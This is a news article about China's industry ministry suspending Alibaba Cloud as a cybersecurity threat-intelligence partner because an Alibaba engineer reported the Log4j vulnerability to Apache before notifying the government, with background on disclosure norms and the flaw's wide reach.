Apache Log4j bug: China’s industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first
- The Ministry of Industry and Information Technology said it will suspend work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months
- Notifying vendors first about security flaws is a cybersecurity industry norm, but a new law encourages Chinese companies to first notify the government
The Ministry of Industry and Information Technology (MIIT) is suspending work with Alibaba Cloud as a cybersecurity threat intelligence partner for six months because the company did not immediately report a severe bug in the widely used logging software to the government agency, the 21st Century Business Herald reported. The ministry also said it would reassess whether to resume the partnership at that time, based on measures Alibaba has taken to correct the problem.
Losing the support of the agency could affect business prospects for the cloud computing unit of Alibaba, the owner of the South China Morning Post. However, specific losses for the country’s largest cloud business are hard to determine.
China faces cybersecurity talent shortage amid new data security rules
The MIIT launched a cybersecurity threat intelligence sharing platform in December 2019 to serve as a state-led alliance in dealing with security threats. Membership in the platform is government recognition of the member’s capabilities in spotting and managing threats.
The MIIT did not publish a public statement about its decision, and Alibaba did not respond to a request for comment.
The Log4j vulnerability has been described as a “nightmare” and “catastrophic”, with some experts saying it is the most severe cybersecurity threat ever by number of devices affected. The simple piece of Java-based software can be found in countless internet-connected devices, from Internet-of-Things products like televisions and cameras to the servers running cloud operations for tech giants like Amazon, Google and Microsoft.
The flaw first received widespread attention when it was publicly disclosed on December 9, after Alibaba Cloud Security Team engineer Chen Zhoujun discovered the flaw. Chen notified the Apache Software Foundation, the non-profit corporation that develops the open-source Log4j tool, by email on November 24.
02:44
US, Britain and EU accuse China of sponsoring massive Microsoft email server hack
The MIIT cybersecurity management bureau released a statement on December 9 saying it was notified about the vulnerability by “relevant” cybersecurity institutions. The ministry summoned Alibaba Cloud and other cybersecurity firms to discuss the situation, it said. It also urged companies and the public to monitor for updates to patch their systems.
Cybersecurity industry norms encourage notifying vendors of security flaws first, giving them ample time to address the problem, before disclosing the issue to the public. Apache released a patch for the Log4j bug on December 6, three days before public disclosure.
Still, the effect of the bug’s discovery is expected to be wide-ranging because of Log4j’s ubiquity. Many people may not even be aware that their systems are compromised.
Beijing launches websites for reporting security vulnerabilities in apps, smart cars
The exploit, known as Log4Shell, allows hackers to remotely execute code by getting it logged by the software. This became a problem in the Java edition of Microsoft’s game Minecraft, for example, allowing players’ to compromise others’ systems by sending malicious code through chat messages.
Cybersecurity experts on Twitter have commended the Alibaba Cloud engineer for responsibly disclosing the vulnerability directly to the tool’s developers.
Since the bug’s public disclosure, cybersecurity experts have warned of an increase in activity scanning for Log4j on vulnerable systems. Microsoft said on December 11 that it found that state actors connected with China, Iran, North Korea and Turkey have been both experimenting and exploiting the vulnerability.
